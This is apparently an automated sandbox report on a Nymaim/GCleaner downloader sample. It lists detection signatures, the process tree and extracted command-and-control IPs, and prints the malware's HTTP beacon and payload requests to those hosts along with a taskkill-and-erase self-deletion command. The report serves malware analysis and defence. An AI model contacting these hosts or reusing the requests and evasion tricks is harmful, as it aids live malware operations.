Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:764043
MD5:71f3a21ccd6e54f8178d3fb65f4849b9
SHA1:b24f88c179a8e0777bffbcc4c9f969fb4d32d148
SHA256:7dbb8aa3f00f0f0d24acf0b1bdb73d05f422e90fd46c2a6fed0b44fe9a0a721a
Tags:exe
Infos:

Detection

Nymaim
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 3748 cmdline: C:\Users\user\Desktop\file.exe MD5: 71F3A21CCD6E54F8178D3FB65F4849B9)
    • is-I19BM.tmp (PID: 5936 cmdline: "C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp" /SL4 $30366 "C:\Users\user\Desktop\file.exe" 2214542 96256 MD5: 2C3832FDF847813369EC960CD39C8265)
      • ntFolders.exe (PID: 4824 cmdline: "C:\Program Files (x86)\PrintFolders\ntFolders.exe" MD5: D9A39F6C4EEDC8F1B89E30D35012D6B4)
        • karcA17.exe (PID: 412 cmdline: MD5: 3FB36CB0B7172E5298D2992D42984D06)
        • cmd.exe (PID: 5776 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 5920 cmdline: taskkill /im "ntFolders.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup
{"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}
SourceRuleDescriptionAuthorStrings
00000002.00000002.393868626.0000000001740000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000002.00000002.393249857.0000000000400000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000002.00000002.394218193.0000000003160000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
        SourceRuleDescriptionAuthorStrings
        2.2.ntFolders.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          2.2.ntFolders.exe.3160000.4.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            2.2.ntFolders.exe.3160000.4.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              2.2.ntFolders.exe.400000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                No Sigma rule has matched
                Timestamp:192.168.2.445.139.105.17149691802041920 12/09/22-11:02:15.223774
                SID:2041920
                Source Port:49691
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:107.182.129.235192.168.2.480496922852925 12/09/22-11:02:15.529889
                SID:2852925
                Source Port:80
                Destination Port:49692
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://171.22.30.106/library.phpURL Reputation: Label: malware
                Source: http://171.22.30.106/library.phpHAvira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exeReversingLabs: Detection: 50%
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeJoe Sandbox ML: detected
                Source: 0.0.file.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 0.3.file.exe.2118000.4.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 0.2.file.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 2.2.ntFolders.exe.10000000.6.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 2.2.ntFolders.exe.3160000.4.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_10001000 ISCryptGetVersion,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_10001130 ArcFourCrypt,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,

                Compliance

                barindex
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeUnpacked PE file: 2.2.ntFolders.exe.400000.0.unpack
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: Binary string: E:\DATA\Codework\PrintFolders\source\Release\Russian.pdb source: is-RBTTG.tmp.1.dr
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00451554 FindFirstFileA,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0048A778 FindFirstFileA,6D7069D0,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00423E2D FindFirstFileExW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_1000959D FindFirstFileExW,
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\

                Networking

                barindex
                Source: TrafficSnort IDS: 2041920 ET TROJAN GCleaner Downloader Activity M8 192.168.2.4:49691 -> 45.139.105.171:80
                Source: TrafficSnort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 107.182.129.235:80 -> 192.168.2.4:49692
                Source: Malware configuration extractorIPs: 45.139.105.1
                Source: Malware configuration extractorIPs: 85.31.46.167
                Source: Malware configuration extractorIPs: 107.182.129.235
                Source: Malware configuration extractorIPs: 171.22.30.106
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewIP Address: 45.139.105.171 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.php
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/ping.php
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.php
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.phpH
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp, ntFolders.exe, 00000002.00000002.394139951.000000000187A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                Source: file.exeString found in binary or memory: http://www.innosetup.com
                Source: is-I19BM.tmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, 00000001.00000002.395161258.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.drString found in binary or memory: http://www.innosetup.comDVarFileInfo$
                Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.drString found in binary or memory: http://www.remobjects.com/?ps
                Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.drString found in binary or memory: http://www.remobjects.com/?psU
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
                Source: global trafficHTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.ntFolders.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ntFolders.exe.3160000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ntFolders.exe.3160000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ntFolders.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.393868626.0000000001740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.393249857.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.394218193.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004081C8
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00468940
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00460F30
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0043DF70
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004303A4
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0047A6D8
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004446E8
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00434994
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0045AA90
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00480BDC
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00444C90
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00462F38
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00445388
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00435698
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00445794
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_0042F948
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00457BB4
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00404490
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_004096F0
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_004056A0
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00406800
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00406AA0
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00404D40
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00405F40
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00402F20
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_004150D3
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00415305
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_004223A9
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00419510
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00404840
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00426850
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00410A50
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_0042AB9A
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00421C88
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_0042ACBA
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00447D2D
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00428D39
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_00404F20
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_1000F670
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_1000EC61
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: String function: 004035DC appears 90 times
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: String function: 00403548 appears 61 times
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: String function: 00407B08 appears 33 times
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: String function: 00445FF4 appears 43 times
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: String function: 00455A04 appears 49 times
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: String function: 004037CC appears 193 times
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: String function: 00405AA4 appears 92 times
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: String function: 00455814 appears 86 times
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: String function: 004462C4 appears 58 times
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: String function: 004348AC appears 32 times
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: String function: 00451AFC appears 62 times
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: String function: 00408DF0 appears 42 times
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: String function: 10003C50 appears 34 times
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: String function: 0040F9E0 appears 54 times
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00423D9C NtdllDefWindowProc_A,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004127F0 NtdllDefWindowProc_A,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_004551C4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,
